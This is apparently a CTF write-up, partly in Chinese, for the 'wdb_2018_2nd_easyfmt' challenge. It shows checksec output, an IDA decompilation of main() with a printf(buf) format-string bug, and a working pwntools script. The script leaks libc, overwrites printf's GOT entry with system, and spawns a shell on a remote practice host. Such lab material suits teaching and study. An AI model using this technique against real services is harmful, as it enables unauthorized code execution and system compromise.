wdb_2018_2nd_easyfmt
https://github.com/hacker-mao/ctf_repo/tree/master/2018WDB
0x01
checksec
[*] '/home/zelas/Desktop/pwn/wdb_2018_2nd_easyfmt/wdb_2018_2nd_easyfmt'
    Arch:     i386-32-little
    RELRO:    Partial RELRO      //GOT 可写，后面改写 printf 的 GOT 表项依赖这一点
    Stack:    No canary found
    NX:       NX enabled         //栈不可执行
    PIE:      No PIE (0x8048000)
IDA
main()
/*
 * main() of the challenge binary as decompiled by IDA (i386, see checksec above).
 *
 * Behaviour visible in this listing: make stdio unbuffered, print a banner,
 * then loop forever reading up to 100 bytes from fd 0 into a stack buffer and
 * handing that buffer to printf() as the FORMAT STRING, followed by '\n'.
 * The loop has no exit, hence the __noreturn annotation.
 *
 * Defects a code review would flag:
 *   - printf(buf): user-controlled format string (read/write primitive for the
 *     caller of the service). Fix: printf("%s", buf) or fputs(buf, stdout).
 *   - read(0, buf, 0x64u) with buf[100]: the read can fill every byte of the
 *     buffer, so nothing guarantees a NUL terminator before printf() scans it.
 */
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  char buf[100];        /* 100-byte stack buffer; 0x64 == 100 == sizeof(buf) below */
  unsigned int v4;      /* written once from gs:0x14, never read again in this listing */

  v4 = __readgsdword(0x14u);  /* IDA's rendering of a load from gs:0x14 (on i386 glibc this
                                 slot normally holds the stack cookie); checksec reports no
                                 canary and v4 is unused here, so treat it as compiler noise */
  setbuf(stdin, 0);           /* setbuf(stream, NULL) makes each stream unbuffered */
  setbuf(stdout, 0);
  setbuf(stderr, 0);
  puts("Do you know repeater?");
  while ( 1 )
  {
    read(0, buf, 0x64u);      /* up to 100 bytes, return value ignored, no terminator added */
    printf(buf);              /* format-string sink: attacker-controlled format */
    putchar(10);              /* '\n' */
  }
}
0x02
思路 fmt str
首先通过格式化字符串泄露栈
通过格式化字符串将 printf 的 GOT 表项改写为 system 的地址
发送 /bin/sh\x00，此时程序中的 printf(buf) 实际执行的是 system("/bin/sh")
0x03
exp
# Writeup exploit script for the challenge above, as published by the author.
# The three steps mirror the 思路 section: leak an address through the
# format string, rewrite printf's GOT entry with fmtstr_payload, then send
# a command line. Several values are environment-specific (see notes below).
from pwn import *
context(os='linux', arch='i386', log_level='debug')

io = remote("node4.buuoj.cn", 27832)
elf = ELF("./wdb_2018_2nd_easyfmt")
libc = ELF("./libc-2.23.so")   # assumed to match the remote libc; not verified on this page

io.recvuntil("Do you know repeater?")

# Step 1: put printf's GOT address at the start of buf and dereference it with %6$s.
# Offset 6 is the author's measured position of buf among printf's stack arguments;
# the measurement itself is not shown on this page.
printf_got = elf.got['printf']
payload = flat(printf_got, b"%6$s")
io.sendline(payload)
# Assumes the leaked pointer's most significant byte is 0xf7 (typical i386 libc mapping).
printf_addr = u32(io.recvuntil("\xf7")[-4:])
print(hex(printf_addr))

libc_base = printf_addr - libc.sym['printf']
system = libc_base + libc.sym['system']
log.success(hex(printf_got))

# Step 2: overwrite printf@got with system. Only possible because RELRO is
# Partial (GOT writable) -- Full RELRO would stop this.
payload = fmtstr_payload(6, {printf_got: system})
io.sendline(payload)

# Step 3: the next printf(buf) call now runs system(buf).
io.sendline(b"/bin/sh\x00")
io.interactive()